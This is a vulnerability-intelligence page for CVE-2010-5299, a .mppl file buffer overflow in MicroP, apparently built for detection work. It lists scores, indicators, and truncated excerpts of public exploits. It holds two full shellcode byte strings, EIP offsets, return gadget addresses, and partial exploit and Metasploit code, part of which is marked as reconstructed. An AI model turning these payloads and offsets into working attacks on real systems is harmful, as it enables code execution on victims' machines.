CVE-2010-5299
Published: 2014-05-23
Priority: P3 · 50 · medium · CVSS 2.0 base score 6.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: public exploit code available (Exploit-DB and Metasploit entries below)
EPSS: 33.58% (98.2th percentile)
Stack-based buffer overflow in MicroP 0.1.1.1600 allows remote attackers to execute arbitrary code via a crafted .mppl file. NOTE: it has been reported that the overflow is in the lpFileName parameter of the CreateFileA function, but the overflow is probably caused by a separate, unnamed function.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microp_project | microp | — | — |
Detection & IOCs (extracted from sources)
- bytes (shellcode string from the 2010 PoC, the windows/exec payload encoded with x86/shikata_ga_nai): `\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca`
- bytes (second extracted shellcode string): `\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7`
- Malicious .mppl files trigger a stack-based buffer overflow at EIP offset 1276 (Metasploit module) or ~1132–1163 bytes (PoC exploits); detect anomalously large .mppl files or .mppl files containing high-entropy shellcode followed by a RET address.
- The exploit overwrites the lpFileName parameter of CreateFileA(); monitor for CreateFileA calls where the filename buffer originates from a .mppl file parse and is abnormally long.
- ROP/return gadget 0x100145B5 (jmp eax) in bass.dll is used as the EIP overwrite target across multiple exploits; flag execution transfers to this address from MicroP's process space.
- Bad characters for payload encoding are \x00, \x0a, \x0d; shellcode in malicious .mppl files will not contain null bytes, newlines, or carriage returns.
- The x86/shikata_ga_nai encoder is used on the shellcode payload embedded in the .mppl file; scan .mppl file content for shikata_ga_nai decoder stubs.
- The overflow offset varies across exploit implementations (1276 in the Metasploit module vs. ~1132–1163 in the standalone PoCs), suggesting slight differences in environment or build; detection rules should account for a range of offsets.
- Two different RET gadget addresses are used across exploits (0x100145B5 in bass.dll vs. 0x10022b63 in base.dll), indicating the gadget selection is environment-dependent; both should be monitored.
- The NVD advisory notes the overflow is probably caused by a separate, unnamed function rather than directly in CreateFileA's lpFileName parameter; root-cause tracing should not stop at CreateFileA.
- The exploit is classified as local/file-format (it requires the victim to open a crafted .mppl file); it is not a network-reachable vulnerability despite the NVD "remote attackers" wording.
No detection rules found.
Exploit-DB: MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow (exploitdb, 2014-03-14)
---
```ruby
#!/usr/bin/env ruby
# Exploit Title:MicroP(.mppl) Local Stack Based Buffer Overflow
# Author:Necmettin COSKUN => twitter.com/babayarisi
# Blog : http://www.ncoskun.com http://www.grisapka.org
# Vendor :http://sourceforge.net/projects/microp/
# Software link:http://sourceforge.net/projects/microp/files/latest/download
# version: 0.1.1.1600
# Tested on: windows XP sp2
# 4ewa2getha! ;)
print "\n"
print "\n"
print " by\n"
print " _ _ _ v2 _ \n"
print " | |_ ___| |_ ___ _ _ ___ ___|_|___|_| \n"
print " | . | .'| . | .'| | | .'| _| |_ -| | \n"
print " |___|__,|___|__,|_ |__,|_| |_|___|_| \n"
print " |___| \n"
print " \n"
print "\n"
print "\n"
#shellcode = http://www.exploit-db.com/exploits/28996/
#User32-free Messagebox Shellcode f
```
Exploit-DB: MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow (Metasploit) (exploitdb, 2011-07-07)
---
```ruby
##
# $Id: microp_mppl.rb 13114 2011-07-07 06:29:37Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

# The class header, the FILEFORMAT mixin and the 'Name' key below are
# reconstructed from the standard Metasploit3 file-format module layout;
# the extracted copy lost everything between "Metasploit3" and the module
# name because the "<" was treated as an HTML tag.
class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow',
      'Description' => %q{
        This module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based
        buffer overflow occurs when the content of a .mppl file gets copied onto the stack,
        which overwrites the lpFileName parameter of a CreateFileA() function, and results
        arbitrary code execution under the context
```
Exploit-DB: MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow (exploitdb, 2010-08-23)
---
```ruby
# Exploit Title: MicroP malicious MPPL Buffer Overflow
# Date: 08/23/10
# Author: james [AT] learnsecurityonline [DOT] com
# Software Link: http://sourceforge.net/projects/microp/
# Version: 0.1.1.1600
# Tested on: Windows XP SP3 EN
#!/usr/bin/env ruby
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
boom = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70"
boom << "\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31"
boom << "\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4"
boom << "\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23"
boom << "\xf5\xf3\xb4\xae\x7d\x02\xaa\x3a\x32"
boom << "\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29"
boom << "\x21\xe7\x96\x60\xf5\x71\xca\x06\x35"
boom << "\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0"
boom <<
```
Metasploit: MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
This module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based buffer overflow occurs when the content of a .mppl file gets copied onto the stack, which overwrites the lpFileName parameter of a CreateFileA() function, and results in arbitrary code execution under the context of the user.
No writeups or analysis indexed.
References
- http://osvdb.org/show/osvdb/73627
- http://packetstormsecurity.com/files/125723/MicroP-0.1.1.1600-Buffer-Overflow.html
- http://www.exploit-db.com/exploits/14720
- http://www.exploit-db.com/exploits/17502
- http://www.exploit-db.com/exploits/32261
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/microp_mppl.rb